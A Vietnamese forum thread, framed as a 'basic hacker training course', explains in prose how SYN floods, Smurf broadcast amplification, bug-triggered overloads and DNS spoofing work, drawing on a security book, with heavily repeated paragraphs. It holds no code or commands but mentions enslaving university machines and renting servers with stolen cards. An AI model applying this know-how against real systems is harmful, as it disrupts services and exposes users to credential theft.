chương trình đào tạo hacker ( khóa cơ bản )
4 posters
Trang 1 trong tổng số 4 trang
Trang 1 trong tổng số 4 trang • 1, 2, 3, 4
chương trình đào tạo hacker ( khóa cơ bản )
Đọc hết chỗ này thì tạm hiểu làm sao thằng hacker có thể hack vào máy nhà mình !!!
Hacking Techniques for Attacks (Những kỹ thuật hacker thường dùng với mục đích tấn công)
Các hacker hoàn toàn có thể trút hết cơn tàn phá mà không cần thiết phải chui vào trong hệ thống của bạn. Ví dụ, một hacker có thể đánh sụm máy chủ của bạn bằng cách cho máy bạn tràn ngập các tín hiệu khó chịu (obnoxious signal) hoặc tràn ngập các đoạn mã có hại (malicious code). Kỹ thuật này được gọi là tấn công từ chối dịch vụ (DoS – Denial of Service).
Các hacker sẽ tiến hành một cuộc tấn công DoS theo một trong hai phương pháp, cả hai phương pháp này đều khả thi. Phương pháp thứ nhất là làm tràn ngập máy tính mục tiêu bằng luồng thông tin áp đảo. Phương pháp thứ hai là gửi lệnh lừa đảo tuyệt khéo (well-crafted command) hoặc gửi dữ liệu sai (erroneous data) có thể làm sụm máy tính mục tiêu.
Phần I : Làm tràn ngập bằng SYN (SYN Flooding)
Kiểu tấn công DoS thứ nhất là làm tràn ngập bằng tín hiệu SYN. Một vụ tấn công SYN sẽ bắt buộc các tài nguyên của máy tính mục tiêu ngừng hoạt động, bằng cách ép chúng phải đáp ứng một cơn lũ các lệnh. Để có thể hiểu được điều này, hãy tưởng tượng bạn đang làm thư ký trong một công ty, nhiệm vụ của bạn là trả lời và chuyển các cuộc gọi điện thoại. Cái gì sẽ xảy ra nếu cùng lúc có hai trăm người gọi đến và đều cúp máy khi bạn bắt máy trả lời? Bạn sẽ rất bận rộn để bắt cho hết các cuộc điện thoại tào lao này (làm sao dám bỏ một cuộc gọi nào), và chắc chắn bạn sẽ không thể làm xong bất kỳ công việc nào khác. Cuối cùng bạn sẽ khóc rưng rức, sẽ khùng luôn và chắc chắn phải “say goodbye” với cái ghế thư ký khốn khổ đó. Hacker sẽ dùng một kỹ thuật giống như vậy khi họ triển khai một vụ tấn công DoS.
Để tiến hành một vụ tấn công DoS, đầu tiên hacker phải xác định được địa chỉ IP của mục tiêu. Sau đó, hacker sẽ dùng địa chỉ IP này để kết nối vào mục tiêu bằng một máy tính client. Để khuếch đại uy lực của cuộc tấn công, hacker sẽ thường setup rất nhiều máy tính client cùng lúc tấn công mục tiêu. Để làm được việc này, thường thì trước đó hacker đã phải thực hiện vài cú hack mở màn để lấy được quyền điều khiển trên một loạt máy tính có băng thông kết nối rộng. Nguồn phổ biến nhất để cung cấp những máy tính “nô lệ” này chính là hệ thống mạng máy tính của các trường đại học hoặc là hacker sẽ dùng những credit card “chùa” để thuê các server và dùng nó làm công cụ phục vụ ý đồ của mình. Khi hacker setup xong các máy tính nô lệ của mình, anh ta sẽ ngồi ở trung tâm điều khiển bà bắt đầu phát động cuộc tấn công.
Quy trình kết nối liên lạc của máy tính gồm 3 bước bắt tay. Một cú tấn công theo kiểu SYN sẽ cải biên quá trình bắt tay này, nhằm hạ gục bằng cách làm cho máy tính bị quá tải. Như bạn đã biết, đầu tiên máy tính client sẽ gửi gói tin SYN đến máy tính server để bắt đầu kết nối. khi máy tính server nhận được gọi tin này, nó sẽ xử lý tím địa chỉ trả về và gửi ngược lại một gọi tin SYN ACK. Đây chính là điểm mà cuộc tấn công DoS tìm kiếm.
Một server bao giờ cũng chỉ có một số hạn chế các tài nguyên để dành cho các kết nối của client. Khi một server nhận được gói tin SYN khởi tạo từ client, server mới bắt đầu định vị các tài nguyên này. Điều này cũng có nghĩa là số kết nối client cùng lúc sẽ bị giới hạn. nếu cùng lúc có quá nhiều client kết nối, server sẽ bị tràn và sẽ “bức sô” do quá trình xử lý bị quá tải.
Hacking Techniques for Attacks (Những kỹ thuật hacker thường dùng với mục đích tấn công)
Các hacker hoàn toàn có thể trút hết cơn tàn phá mà không cần thiết phải chui vào trong hệ thống của bạn. Ví dụ, một hacker có thể đánh sụm máy chủ của bạn bằng cách cho máy bạn tràn ngập các tín hiệu khó chịu (obnoxious signal) hoặc tràn ngập các đoạn mã có hại (malicious code). Kỹ thuật này được gọi là tấn công từ chối dịch vụ (DoS – Denial of Service).
Các hacker sẽ tiến hành một cuộc tấn công DoS theo một trong hai phương pháp, cả hai phương pháp này đều khả thi. Phương pháp thứ nhất là làm tràn ngập máy tính mục tiêu bằng luồng thông tin áp đảo. Phương pháp thứ hai là gửi lệnh lừa đảo tuyệt khéo (well-crafted command) hoặc gửi dữ liệu sai (erroneous data) có thể làm sụm máy tính mục tiêu.
Phần I : Làm tràn ngập bằng SYN (SYN Flooding)
Kiểu tấn công DoS thứ nhất là làm tràn ngập bằng tín hiệu SYN. Một vụ tấn công SYN sẽ bắt buộc các tài nguyên của máy tính mục tiêu ngừng hoạt động, bằng cách ép chúng phải đáp ứng một cơn lũ các lệnh. Để có thể hiểu được điều này, hãy tưởng tượng bạn đang làm thư ký trong một công ty, nhiệm vụ của bạn là trả lời và chuyển các cuộc gọi điện thoại. Cái gì sẽ xảy ra nếu cùng lúc có hai trăm người gọi đến và đều cúp máy khi bạn bắt máy trả lời? Bạn sẽ rất bận rộn để bắt cho hết các cuộc điện thoại tào lao này (làm sao dám bỏ một cuộc gọi nào), và chắc chắn bạn sẽ không thể làm xong bất kỳ công việc nào khác. Cuối cùng bạn sẽ khóc rưng rức, sẽ khùng luôn và chắc chắn phải “say goodbye” với cái ghế thư ký khốn khổ đó. Hacker sẽ dùng một kỹ thuật giống như vậy khi họ triển khai một vụ tấn công DoS.
Để tiến hành một vụ tấn công DoS, đầu tiên hacker phải xác định được địa chỉ IP của mục tiêu. Sau đó, hacker sẽ dùng địa chỉ IP này để kết nối vào mục tiêu bằng một máy tính client. Để khuếch đại uy lực của cuộc tấn công, hacker sẽ thường setup rất nhiều máy tính client cùng lúc tấn công mục tiêu. Để làm được việc này, thường thì trước đó hacker đã phải thực hiện vài cú hack mở màn để lấy được quyền điều khiển trên một loạt máy tính có băng thông kết nối rộng. Nguồn phổ biến nhất để cung cấp những máy tính “nô lệ” này chính là hệ thống mạng máy tính của các trường đại học hoặc là hacker sẽ dùng những credit card “chùa” để thuê các server và dùng nó làm công cụ phục vụ ý đồ của mình. Khi hacker setup xong các máy tính nô lệ của mình, anh ta sẽ ngồi ở trung tâm điều khiển bà bắt đầu phát động cuộc tấn công.
Quy trình kết nối liên lạc của máy tính gồm 3 bước bắt tay. Một cú tấn công theo kiểu SYN sẽ cải biên quá trình bắt tay này, nhằm hạ gục bằng cách làm cho máy tính bị quá tải. Như bạn đã biết, đầu tiên máy tính client sẽ gửi gói tin SYN đến máy tính server để bắt đầu kết nối. khi máy tính server nhận được gọi tin này, nó sẽ xử lý tím địa chỉ trả về và gửi ngược lại một gọi tin SYN ACK. Đây chính là điểm mà cuộc tấn công DoS tìm kiếm.
Một server bao giờ cũng chỉ có một số hạn chế các tài nguyên để dành cho các kết nối của client. Khi một server nhận được gói tin SYN khởi tạo từ client, server mới bắt đầu định vị các tài nguyên này. Điều này cũng có nghĩa là số kết nối client cùng lúc sẽ bị giới hạn. nếu cùng lúc có quá nhiều client kết nối, server sẽ bị tràn và sẽ “bức sô” do quá trình xử lý bị quá tải.
redx1412- Kẻ khủng bố
- Tổng số bài gửi : 542
Join date : 10/06/2009
Age : 30
Đến từ : Dark World
Re: chương trình đào tạo hacker ( khóa cơ bản )
Yếu điểm của hệ thống lúc này sẽ hiện ra khi hacker cố tính đưa vào một địa chỉ trả về giả mạo trong gói SYN ban đầu. Như vậy, khi server gửi ngược gói tin SYN ACL cho client giả mạo, nó sẽ không bao giờ nhận được gói tin ACK kết thúc. Như vậy là đối với từng gói SYN giả mạo, các tài nguyên càng ngày càng bị buộc phải ngưng hoạt động cho đến khi mà server từ chối không nhận thêm kết nối nào nữa. Để tấn công được, cần phải có vô số các gói tin giả mạo, nhưng nếu hacker có nhiều máy tính nô lệ để cùng gửi các gói tin, anh ta có thể làm quá tải hệ thống một cách nhanh chóng.
Một ví dụ nổi tiếng của kiểu tấn công này đã xảy ra vào cuối năm 1999. Rất nhiều Web xịn đã bị sụm trước một cơn lũ các tín hiệu cùng lúc đến từ hàng trăm máy tính khác nhau. Các trang Web sẽ không hề hấn gì nếu cuộc tấn công chỉ xảy ra từ một máy; tuy nhiên, bằng việc dùng các chương trình điều khiển từ xa, một hoặc một số hacker sẽ phát động một cuộc tấn công phối hợp dùng cùng lúc hàng trăm-hàng ngàn máy tính, như vậy mục tiêu của họ sẽ bị quá tải một cách nhanh chóng.
———
Tài liệu tham khảo : Windows Internet Security-Protecting Your Critical Data (Seth Fogie & Dr. Cyrus Peikari)
Một ví dụ nổi tiếng của kiểu tấn công này đã xảy ra vào cuối năm 1999. Rất nhiều Web xịn đã bị sụm trước một cơn lũ các tín hiệu cùng lúc đến từ hàng trăm máy tính khác nhau. Các trang Web sẽ không hề hấn gì nếu cuộc tấn công chỉ xảy ra từ một máy; tuy nhiên, bằng việc dùng các chương trình điều khiển từ xa, một hoặc một số hacker sẽ phát động một cuộc tấn công phối hợp dùng cùng lúc hàng trăm-hàng ngàn máy tính, như vậy mục tiêu của họ sẽ bị quá tải một cách nhanh chóng.
———
Tài liệu tham khảo : Windows Internet Security-Protecting Your Critical Data (Seth Fogie & Dr. Cyrus Peikari)
redx1412- Kẻ khủng bố
- Tổng số bài gửi : 542
Join date : 10/06/2009
Age : 30
Đến từ : Dark World
Re: chương trình đào tạo hacker ( khóa cơ bản )
Phần 2 : Xì trum tấn công (Smurf Attacks)
Một biến thể của tấn công DoS gây tràn ngập là tấn công kiểu Smurf (*). Bạn hãy tưởng tượng một công ty nọ có năm mươi nhân viên chuyên giải đáp thắc mắc của khách hàng bằng email. Mỗi nhân viên này dùng một chương trình trả lời tự động không giới hạn, chương trình này sẽ tự động gửi các mail trả lời lịch sự khi nhận được câu hỏi. Điều gì sẽ xảy ra, nếu có một khách hàng vì bực bội đã gửi một trăm bản email copy cho mỗi người trong số năm mươi nhân viên nói trên, với địa chỉ email trả về (return address) giả mạo? Lúc đó một trăm email đến sẽ làm phát sinh… năm ngàn email đi, mà lại đi tới chỉ… một mailbox duy nhất. Vô phúc cho ai sở hữu địa chỉ bị ông khách hàng quý hóa kia lấy làm địa chỉ giả mạo, mailbox của anh ta sẽ tràn ngập những mail là mail! Điều đau khổ của khổ chủ là phải ngồi duyệt hết đống xà bần đó, để bảo đảm là không bỏ sót một email quan trọng nào do xếp hoặc bạn bè mình gửi đến, hix hix. Tấn công kiểu Smurf cũng tương tự như ví dụ vừa nêu. Kẻ tấn công sẽ gửi một tín hiệu yêu cầu đến một mạng nhiều máy tính, và tất nhiên là mỗi máy tính trong mạng đều sẽ trả lời cho một địa chỉ giả mạo. Các chương trình đặc biệt kết hợp một số kỹ thuật khác sẽ khuếch đại chuyện này cho đến khi một cơn lũ thông tin ập đổ xuống đầu một máy tính tội nghiệp.
Như bạn đã biết, một máy tính sẽ bỏ qua tất cả các gói tin không có địa chỉ rõ ràng chính xác. Có một ngoại lệ cho chuyện này nếu máy tính dùng loại card mạng chạy ở mode ngẫu nhiên (promiscuous). Tuy nhiên, có một ngoại lệ khác nữa mà chúng ta vẫn chưa bàn tới.
Công ty của bạn sẽ làm gì nếu muốn chuyển một thông báo quan trọng tới tất cả mọi người trong công ty? Nếu email là một trong các khả năng, công ty sẽ gửi một spam mail nội bộ tới mọi thành viên có địa chỉ email. Mặt khác, công ty có thể thông báo trên hệ thống loa. Hoặc họ có thể đặt một bảng thông báo gần máy bán cà phê tự động. Tất cả những kỹ thuật vừa nêu chỉ nhằm đảm bảo cho hầu hết nhân viên đều có thể nhận được thông tin. Cũng tương tự như vậy trong một mạng máy tính, có rất nhiều lúc server cần gửi thông tin đến từng máy tính thành viên trong mạng. Điều này được hoàn tất bằng cách sử dụng địa chỉ broadcast.
Do cách xây dựng địa chỉ IP bên trong một mạng, luôn luôn có một địa chỉ mà mỗi máy tính đều sẽ trả lời. Địa chỉ này được gọi là địa chỉ broadcast và thường được dùng để cập nhật các danh sách tên và những mục cần thiết khác mà các máy tính đều cần để giữ cho mạng tồn tại và hoạt động được. Mặc dù địa chỉ broadcast là cần thiết trong một số trường hợp, nhưng nó cũng có thể đưa tới cái gọi là cơn bão broadcast.
Một cơn bão broadcast cũng tương tự như một tiếng vọng không bao giờ mất. Còn đặc biệt hơn nữa, nó giống như một tiếng vọng nhưng lại mạnh dần lên cho đến khi bạn không còn có thể nghe thấy gì nữa vì quá ồn. Nếu một máy tính gửi đi một yêu cầu đến hệ thống mạng nhưng lại dùng địa chỉ broadcast và địa chỉ trả về cũng là địa chỉ broadcast thì từng máy tính trong mạng sẽ đáp ứng đến từng lời đáp ứng của máy tính khác; chuyện này tiếp tục diễn ra theo hiệu ứng quả cầu tuyết (**) cho đến khi toàn mạng đầy những gói tin echo khiến cho chẳng còn gì có thể gửi qua được nữa.
Bây giờ bạn đã hiểu cách thức làm việc của broadcast, hãy tưởng tượng cái gì xảy ra nếu một hacker gửi một ngàn gói tin broadcast đến mạng của chúng ta và hắn lại dùng địa chỉ IP trả về giả mạo (Spoofed Return IP Address). Mạng chắc chắn sẽ khuếch đại các gói tin ban đầu lên thành mười ngàn hoặc trăm ngàn gói tin và tống tất tần tật đến một máy tính vô tội bị giả địa chỉ.
Trong trường hợp này, không giống như kiểu tấn công SYN, máy tính mục tiêu vẫn có thể xây dựng một chầu kết nối với máy tính phát yêu cầu. Tuy nhiên, sự tăng quá mức của các yêu cầu kết nối sẽ làm cho server ngập đầu ngập cổ, và như thế là server trở nên vô dụng.
Một biến thể của tấn công DoS gây tràn ngập là tấn công kiểu Smurf (*). Bạn hãy tưởng tượng một công ty nọ có năm mươi nhân viên chuyên giải đáp thắc mắc của khách hàng bằng email. Mỗi nhân viên này dùng một chương trình trả lời tự động không giới hạn, chương trình này sẽ tự động gửi các mail trả lời lịch sự khi nhận được câu hỏi. Điều gì sẽ xảy ra, nếu có một khách hàng vì bực bội đã gửi một trăm bản email copy cho mỗi người trong số năm mươi nhân viên nói trên, với địa chỉ email trả về (return address) giả mạo? Lúc đó một trăm email đến sẽ làm phát sinh… năm ngàn email đi, mà lại đi tới chỉ… một mailbox duy nhất. Vô phúc cho ai sở hữu địa chỉ bị ông khách hàng quý hóa kia lấy làm địa chỉ giả mạo, mailbox của anh ta sẽ tràn ngập những mail là mail! Điều đau khổ của khổ chủ là phải ngồi duyệt hết đống xà bần đó, để bảo đảm là không bỏ sót một email quan trọng nào do xếp hoặc bạn bè mình gửi đến, hix hix. Tấn công kiểu Smurf cũng tương tự như ví dụ vừa nêu. Kẻ tấn công sẽ gửi một tín hiệu yêu cầu đến một mạng nhiều máy tính, và tất nhiên là mỗi máy tính trong mạng đều sẽ trả lời cho một địa chỉ giả mạo. Các chương trình đặc biệt kết hợp một số kỹ thuật khác sẽ khuếch đại chuyện này cho đến khi một cơn lũ thông tin ập đổ xuống đầu một máy tính tội nghiệp.
Như bạn đã biết, một máy tính sẽ bỏ qua tất cả các gói tin không có địa chỉ rõ ràng chính xác. Có một ngoại lệ cho chuyện này nếu máy tính dùng loại card mạng chạy ở mode ngẫu nhiên (promiscuous). Tuy nhiên, có một ngoại lệ khác nữa mà chúng ta vẫn chưa bàn tới.
Công ty của bạn sẽ làm gì nếu muốn chuyển một thông báo quan trọng tới tất cả mọi người trong công ty? Nếu email là một trong các khả năng, công ty sẽ gửi một spam mail nội bộ tới mọi thành viên có địa chỉ email. Mặt khác, công ty có thể thông báo trên hệ thống loa. Hoặc họ có thể đặt một bảng thông báo gần máy bán cà phê tự động. Tất cả những kỹ thuật vừa nêu chỉ nhằm đảm bảo cho hầu hết nhân viên đều có thể nhận được thông tin. Cũng tương tự như vậy trong một mạng máy tính, có rất nhiều lúc server cần gửi thông tin đến từng máy tính thành viên trong mạng. Điều này được hoàn tất bằng cách sử dụng địa chỉ broadcast.
Do cách xây dựng địa chỉ IP bên trong một mạng, luôn luôn có một địa chỉ mà mỗi máy tính đều sẽ trả lời. Địa chỉ này được gọi là địa chỉ broadcast và thường được dùng để cập nhật các danh sách tên và những mục cần thiết khác mà các máy tính đều cần để giữ cho mạng tồn tại và hoạt động được. Mặc dù địa chỉ broadcast là cần thiết trong một số trường hợp, nhưng nó cũng có thể đưa tới cái gọi là cơn bão broadcast.
Một cơn bão broadcast cũng tương tự như một tiếng vọng không bao giờ mất. Còn đặc biệt hơn nữa, nó giống như một tiếng vọng nhưng lại mạnh dần lên cho đến khi bạn không còn có thể nghe thấy gì nữa vì quá ồn. Nếu một máy tính gửi đi một yêu cầu đến hệ thống mạng nhưng lại dùng địa chỉ broadcast và địa chỉ trả về cũng là địa chỉ broadcast thì từng máy tính trong mạng sẽ đáp ứng đến từng lời đáp ứng của máy tính khác; chuyện này tiếp tục diễn ra theo hiệu ứng quả cầu tuyết (**) cho đến khi toàn mạng đầy những gói tin echo khiến cho chẳng còn gì có thể gửi qua được nữa.
Bây giờ bạn đã hiểu cách thức làm việc của broadcast, hãy tưởng tượng cái gì xảy ra nếu một hacker gửi một ngàn gói tin broadcast đến mạng của chúng ta và hắn lại dùng địa chỉ IP trả về giả mạo (Spoofed Return IP Address). Mạng chắc chắn sẽ khuếch đại các gói tin ban đầu lên thành mười ngàn hoặc trăm ngàn gói tin và tống tất tần tật đến một máy tính vô tội bị giả địa chỉ.
Trong trường hợp này, không giống như kiểu tấn công SYN, máy tính mục tiêu vẫn có thể xây dựng một chầu kết nối với máy tính phát yêu cầu. Tuy nhiên, sự tăng quá mức của các yêu cầu kết nối sẽ làm cho server ngập đầu ngập cổ, và như thế là server trở nên vô dụng.
redx1412- Kẻ khủng bố
- Tổng số bài gửi : 542
Join date : 10/06/2009
Age : 30
Đến từ : Dark World
Re: chương trình đào tạo hacker ( khóa cơ bản )
Những kiểu tấn công này không chỉ quất sụm server một cách nhanh chóng và hiệu quả, mà còn giữ cho hacker trở nên vô hình. Với bản chất của cuộc tấn công như vậy, sẽ không thể lần ra được gói tin nguyên thủy do hacker gửi. Trong trường hợp tấn công bằng SYN, địa chỉ phải là địa chỉ bịp. Như thế, điểm xuất phát nguyên thủy của gói tin cũng coi như không thể biết được. Trong trường hợp tấn công kiểu smurf, hacker sẽ không trực tiếp tấn công mục tiêu, mà thay vào đó là dùng hiệu ứng phụ của việc gửi tín hiệu broadcast đến mạng để thực hiện âm mưu một cách gián tiếp. Như thế cuộc tấn công xuất hiện như đến từ hệ thống mạng khác hoặc máy tính khác.
———-
(*) Smurf là tên software lần đầu tiên áp dụng thành công kỹ thuật gây tràn ngập bằng các gói tin broadcast và ping. Tên này lấy theo các nhân vật truyện tranh của họa sĩ người Bỉ Peyo, bản dịch ở Việt Nam gọi là xì trum, gồm 101 chú nhóc bé tí da màu xanh. Bạn có thể xem chi tiết tại:
- http://en.wikipedia.org/wiki/Smurf
- http://en.wikipedia.org/wiki/Smurf_attack
- http://searchsecurity.techtarget.com/sDefinition/0,,sid14_gci213012,00.html
(**) Chắc bạn không lạ gì hiệu ứng này, khi lăn theo sườn dốc phủ đầy tuyết thì đầu tiên chỉ là một nắm tuyết, nhưng đến chân dốc lại là một quả cầu tuyết khổng lồ.
Phần 3 : Làm quá tải hệ thống (System Overloads)
Một kiểu tấn công DoS khác là tấn công các phần mềm đang chạy trên máy tính mục tiêu. Trong các chương trình máy tính, cứ trung bình khoảng 1000 dòng lệnh sẽ có một lỗi (glitch, bug), mà một chương trình thì có thể dài đến cả tỉ dòng, như vậy số lỗi có thể sẽ lên đến cả trăm, cả ngàn. Nếu một hacker biết cách khai thác các lỗi đặc biệt này, anh ta có thể đánh gục được máy tính mục tiêu. Ví dụ, trong một chương trình mua hàng trực tuyến nổi tiếng, người ta đã phát hiện được một lỗi về lập trình có thể làm cho tải của bộ xử lý trung tâm tăng vọt lên đến 100%, như thế cũng có nghĩa là không chương trình nào khác có thể chạy được nữa. Lúc đó chỉ cần gửi đến một yêu cầu đơn giản có dạng chính thức “http://” là có thể cho server mục tiêu sụm bà chè.
Kiểu tấn công này cũng giống như tháo nắp lọ muối. Bình thường, lọ muối hoạt động rất tốt. Nhưng nếu có ai đó hiểu rõ cấu tạo của lọ muối và bí mật tháo lỏng nắp của nó ra. Thế là ô la la, dĩa của bạn ngập đầy muối mặn đắng.
Kiểu tấn công DoS này thường được dùng để khai thác cùng với một vụ làm tràn bộ nhớ đệm. Những kỹ thuật hacker thường dùng để truy cập trái phép (Hacking Techniques for Unauthorized Access), hacker có thể làm tràn bộ nhớ đệm như là một mánh khóe để ép máy tính phải chạy một chương trình bất hảo. Tuy nhiên, kiểu truy xuất này nói chung là khó dùng, bởi vì làm tràn bộ nhớ đệm thường sẽ làm cho máy tính sụm luôn. Như đã giải thích ở phía trước, đoạn chương trình làm tràn sẽ nạp đầy vào một đoạn bộ nhớ đã được xác định trước, sau đó sẽ làm tràn vùng nhớ bên trên, như thế sẽ ghi đè lên dữ liệu của các biến bộ nhớ khác. Lúc đó, nếu có một chương trình nào cần lấy dữ liệu, sẽ đi truy xuất đúng vào các biến bộ nhớ đã bị ghi đè, thế là chương trình “tưng” luôn, và thường là sẽ kéo theo cả máy tính “tưng” luôn cùng với nó.
Các vụ tấn công DoS là mối đe dọa không chỉ đối với các công ty, doanh nghiệp lớn, mà cả đối với các văn phòng nhỏ và người dùng tại nhà. Hiện có sẵn hằng hà sa số các chương trình có thể cho bất kỳ ai khả năng làm tràn một mục tiêu. Chỉ một cái click chuột đơn giản là có thể đổ ầm ầm hàng trăm gói tin SYN xuống thẳng đầu nạn nhân. Nếu bạn nghi là bị tấn công bằng kiểu từ chối dịch vụ, bạn có thể dùng tool NETSTAT để xác định có bị tấn công hay không. Dùng tool này sẽ thấy hiện lên rõ ràng vụ tấn công nếu có. Trong hình dưới trình bày một kết quả của tool NETSTAT cho thấy có một cuộc tấn công SYN. Các dòng ở cột State cho thấy rất rõ hiện đang có một vụ tấn công SYN diễn ra ngầm bên dưới.
———-
(*) Smurf là tên software lần đầu tiên áp dụng thành công kỹ thuật gây tràn ngập bằng các gói tin broadcast và ping. Tên này lấy theo các nhân vật truyện tranh của họa sĩ người Bỉ Peyo, bản dịch ở Việt Nam gọi là xì trum, gồm 101 chú nhóc bé tí da màu xanh. Bạn có thể xem chi tiết tại:
- http://en.wikipedia.org/wiki/Smurf
- http://en.wikipedia.org/wiki/Smurf_attack
- http://searchsecurity.techtarget.com/sDefinition/0,,sid14_gci213012,00.html
(**) Chắc bạn không lạ gì hiệu ứng này, khi lăn theo sườn dốc phủ đầy tuyết thì đầu tiên chỉ là một nắm tuyết, nhưng đến chân dốc lại là một quả cầu tuyết khổng lồ.
Phần 3 : Làm quá tải hệ thống (System Overloads)
Một kiểu tấn công DoS khác là tấn công các phần mềm đang chạy trên máy tính mục tiêu. Trong các chương trình máy tính, cứ trung bình khoảng 1000 dòng lệnh sẽ có một lỗi (glitch, bug), mà một chương trình thì có thể dài đến cả tỉ dòng, như vậy số lỗi có thể sẽ lên đến cả trăm, cả ngàn. Nếu một hacker biết cách khai thác các lỗi đặc biệt này, anh ta có thể đánh gục được máy tính mục tiêu. Ví dụ, trong một chương trình mua hàng trực tuyến nổi tiếng, người ta đã phát hiện được một lỗi về lập trình có thể làm cho tải của bộ xử lý trung tâm tăng vọt lên đến 100%, như thế cũng có nghĩa là không chương trình nào khác có thể chạy được nữa. Lúc đó chỉ cần gửi đến một yêu cầu đơn giản có dạng chính thức “http://” là có thể cho server mục tiêu sụm bà chè.
Kiểu tấn công này cũng giống như tháo nắp lọ muối. Bình thường, lọ muối hoạt động rất tốt. Nhưng nếu có ai đó hiểu rõ cấu tạo của lọ muối và bí mật tháo lỏng nắp của nó ra. Thế là ô la la, dĩa của bạn ngập đầy muối mặn đắng.
Kiểu tấn công DoS này thường được dùng để khai thác cùng với một vụ làm tràn bộ nhớ đệm. Những kỹ thuật hacker thường dùng để truy cập trái phép (Hacking Techniques for Unauthorized Access), hacker có thể làm tràn bộ nhớ đệm như là một mánh khóe để ép máy tính phải chạy một chương trình bất hảo. Tuy nhiên, kiểu truy xuất này nói chung là khó dùng, bởi vì làm tràn bộ nhớ đệm thường sẽ làm cho máy tính sụm luôn. Như đã giải thích ở phía trước, đoạn chương trình làm tràn sẽ nạp đầy vào một đoạn bộ nhớ đã được xác định trước, sau đó sẽ làm tràn vùng nhớ bên trên, như thế sẽ ghi đè lên dữ liệu của các biến bộ nhớ khác. Lúc đó, nếu có một chương trình nào cần lấy dữ liệu, sẽ đi truy xuất đúng vào các biến bộ nhớ đã bị ghi đè, thế là chương trình “tưng” luôn, và thường là sẽ kéo theo cả máy tính “tưng” luôn cùng với nó.
Các vụ tấn công DoS là mối đe dọa không chỉ đối với các công ty, doanh nghiệp lớn, mà cả đối với các văn phòng nhỏ và người dùng tại nhà. Hiện có sẵn hằng hà sa số các chương trình có thể cho bất kỳ ai khả năng làm tràn một mục tiêu. Chỉ một cái click chuột đơn giản là có thể đổ ầm ầm hàng trăm gói tin SYN xuống thẳng đầu nạn nhân. Nếu bạn nghi là bị tấn công bằng kiểu từ chối dịch vụ, bạn có thể dùng tool NETSTAT để xác định có bị tấn công hay không. Dùng tool này sẽ thấy hiện lên rõ ràng vụ tấn công nếu có. Trong hình dưới trình bày một kết quả của tool NETSTAT cho thấy có một cuộc tấn công SYN. Các dòng ở cột State cho thấy rất rõ hiện đang có một vụ tấn công SYN diễn ra ngầm bên dưới.
redx1412- Kẻ khủng bố
- Tổng số bài gửi : 542
Join date : 10/06/2009
Age : 30
Đến từ : Dark World
Re: chương trình đào tạo hacker ( khóa cơ bản )
Như bạn cũng có thể thấy, các cuộc tấn công DoS cũng không đến nỗi phức tạp lắm. Vì rằng, một hacker có thể dễ dàng tìm được các chương trình tấn công có sẵn, cho nên các cuộc tấn công này cũng đâm ra rất phổ biến. Đến đây có thể bạn sẽ hỏi, “Làm sao để ta có thể ngăn chận các cuộc tấn công DoS?”. Thật đáng tiếc là đến nay cũng chưa thể ngăn chận triệt để các cuộc tấn công như thế.
Vì rằng các cuộc tấn công này dựa trên nguyên lý cơ sở để các máy tính xây dựng nên các liên lạc với nhau, cho nên cách duy nhất để chấm dứt những chuyện bậy bạ này là đi sáng chế ra lại một Internet mới. Đến nay cách thức thực tế duy nhất để làm giảm bớt các cuộc tấn công như vậy là chặn (block) tất cả các traffic đến từ một số vùng đặc biệt của Internet. Dù sao, như chúng tôi đã giải thích, các hacker thường có rất nhiều máy tính nô lệ, thường nằm trong các mạng của các trường đại học hay của các công ty. Nếu một server cấm cửa đối với một địa chỉ rõ ràng đã gây ra vụ tấn công, cũng đồng nghĩa là server này cấm mọi người ở hướng đó truy cập mình. Điều này sẽ giống như đặt một chế độ kiểm dịch lên toàn thành phố chỉ vì một người duy nhất trong thành phố bị bệnh thủy đậu.
Phần 4 : Lừa đảo DNS (DNS Spoofing)
Có những kiểu tấn công DoS khác lại hoạt động gián tiếp. Những kiểu tấn công này thường không tập trung vào server mà thay vào đó, mục tiêu sẽ là client. Trong trường hợp này, máy tính client sẽ bị đánh lừa về nơi mà nó muốn đi lấy thông tin. Ví dụ, nếu bạn nghĩ rằng máy tính của bạn sẽ đi đến www.yahoo.com, nhưng hóa ra lại đi đến trang na ná như Yahoo! của hacker, thì có thể vô tình bạn đã cung cấp cho hacker password và những thông tin cá nhân của mình.
Bình thường, một máy tính client sẽ dùng query để hỏi DNS server, khi nó muốn đổi một tên domain hay một địa chỉ trang Web ra thành một địa chỉ IP. Có chuyện này, bởi vì máy tính client cần địa chỉ IP để định vị Web server hay email server dùng tên domain nó đang quan tâm. Quá trình này được tiến hành qua ba bước như sau :
1.Client hỏi DNS server địa chỉ IP ứng với tên domain là bao nhiêu.
2. DNS server sẽ dùng các query để tên domain đã được hỏi.
3. Client kết nối với Web server theo địa chỉ IP đã được DNS server cung cấp.
Tuy vậy, quá trình này có thể dễ dàng bị lợi dụng để đẩy các user cả tin đến những trang Web tầm bậy, hoặc hướng dẫn email đi (outgoing email) phải đi qua những máy tính bất lương. Việc này được thực hiện bằng cách ghi các địa chỉ IP sai vào database của DNS server . Khi điều này xảy ra, hầu như client không thể nhận ra được là đang có vấn đề. Khả năng bại lộ duy nhất chỉ có khi các entry của DNS sever được kiểm tra một cách đặc biệt, hoặc server của hacker bị down.
Trong trường hợp một entry của DNS server bị hack, chỉ có những email đi mới bị gửi đến khu vực lừa đảo, trừ phi mail server sử dụng cùng một DNS server với client. Trong trường hợp tệ hại như thế, cả email đi lẫn email đến (incoming email) đều bị hướng dẫn phải đi qua một máy tính bất lương. Tuy nhiên, trong ví dụ của chúng ta, giả định rằng mail server đang dùng một DNS server rất an ninh để phân giải tên các domain.
Vì rằng các cuộc tấn công này dựa trên nguyên lý cơ sở để các máy tính xây dựng nên các liên lạc với nhau, cho nên cách duy nhất để chấm dứt những chuyện bậy bạ này là đi sáng chế ra lại một Internet mới. Đến nay cách thức thực tế duy nhất để làm giảm bớt các cuộc tấn công như vậy là chặn (block) tất cả các traffic đến từ một số vùng đặc biệt của Internet. Dù sao, như chúng tôi đã giải thích, các hacker thường có rất nhiều máy tính nô lệ, thường nằm trong các mạng của các trường đại học hay của các công ty. Nếu một server cấm cửa đối với một địa chỉ rõ ràng đã gây ra vụ tấn công, cũng đồng nghĩa là server này cấm mọi người ở hướng đó truy cập mình. Điều này sẽ giống như đặt một chế độ kiểm dịch lên toàn thành phố chỉ vì một người duy nhất trong thành phố bị bệnh thủy đậu.
Phần 4 : Lừa đảo DNS (DNS Spoofing)
